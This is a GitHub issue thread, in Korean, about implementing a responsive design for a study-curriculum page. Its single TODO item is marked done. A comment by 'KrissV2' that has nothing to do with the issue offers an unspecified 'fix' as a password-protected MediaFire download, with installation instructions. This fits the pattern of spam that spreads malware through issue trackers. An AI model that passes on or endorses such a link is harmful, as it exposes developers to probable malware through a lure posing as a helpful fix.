### ISSUE TITLE
[Design] 스터디 커리큘럼 반응형 구현

### ISSUE THREAD

**Issue by ghdtjgus76** [GDSC-Hongik/wow-class#97]
## 🎯 설명
스터디 커리큘럼 반응형 디자인 구현합니다.

## ✅ TODO

- [x] 스터디 커리큘럼 반응형 구현

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
